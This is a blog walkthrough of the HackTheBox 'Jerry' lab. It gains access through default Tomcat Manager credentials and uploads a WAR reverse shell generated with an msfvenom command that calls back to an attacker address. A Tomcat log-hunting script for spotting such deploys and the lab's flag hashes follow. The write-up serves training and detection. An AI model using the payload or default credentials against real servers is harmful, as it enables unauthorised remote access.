Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Jerry Windows

Easy machine, you will learn about Apache Tomcat exploitation and .war shells!

Recon

Exploitation

Apache Tomcat is running on port 8080. Clicking on the Manager App link pops up the admin login page, so credentials are needed for admin.

  • After some Google searching we find the default creds for Apache Tomcat: admin:s3cret. We log in to the admin page.

Doing some enumeration on the app reveals that we can upload .WAR files.

So we create a reverse shell using msfvenom and deploy it on Tomcat:

msfvenom -p java/shell_reverse_tcp LHOST=10.10.14.14 LPORT=9999 -f war > evil.war

In Metasploit we set up the handler with use exploit/multi/handler. We collect the flags, as we have a shell with elevated privileges.
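From the hunting side, the steps above leave a recognisable trail in Tomcat's access log: 401s on /manager/, a successful login, then a WAR upload. The script below is an added example, not part of the original writeup. It assumes the AccessLogValve "common" pattern, and the sample lines, the hunt and is_deploy names and the failure threshold are all constructed for illustration.

```python
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')

# Constructed sample log lines (not taken from the machine in this post).
SAMPLE = """\
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - - [01/Jan/2024:10:00:05 +0000] "GET /manager/html HTTP/1.1" 401 2473
192.0.2.10 - admin [01/Jan/2024:10:00:09 +0000] "GET /manager/html HTTP/1.1" 200 19872
192.0.2.10 - admin [01/Jan/2024:10:01:12 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 21044
192.0.2.10 - - [01/Jan/2024:10:01:30 +0000] "GET /evil/ HTTP/1.1" 200 0
198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /docs/ HTTP/1.1" 200 1500
"""

def is_deploy(method, path):
    """True for Manager requests that deploy a WAR (HTML upload or text deploy)."""
    p = path.split("?", 1)[0]
    return (method == "POST" and p == "/manager/html/upload") or \
           (method == "PUT" and p == "/manager/text/deploy")

def hunt(log_text, fail_threshold=2):
    """Return findings as (client, kind, detail) tuples, in log order."""
    failures = defaultdict(int)   # 401 count per client since last success
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue              # skip lines that are not in the common format
        host, user, ts, method, path, status = m.groups()
        if not path.startswith("/manager/"):
            continue              # only the Manager app is of interest here
        if status == "401":
            failures[host] += 1
        elif status == "200" and failures[host] >= fail_threshold:
            findings.append((host, "login-after-failures", f"user={user} fails={failures[host]}"))
            failures[host] = 0
        if is_deploy(method, path) and status == "200":
            findings.append((host, "war-deploy", f"user={user} at {ts}"))
    return findings

if __name__ == "__main__":
    for f in hunt(SAMPLE):
        print(f)
```

A browser always receives one 401 before the Basic auth prompt, so tune fail_threshold to your environment; a war-deploy finding from an unexpected client address is the higher-value signal.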

FLAGS

USER "7004dbcef0f854e0fb401875f26ebd00"
ROOT "04a8b36e1545a455393d067e772fe90e"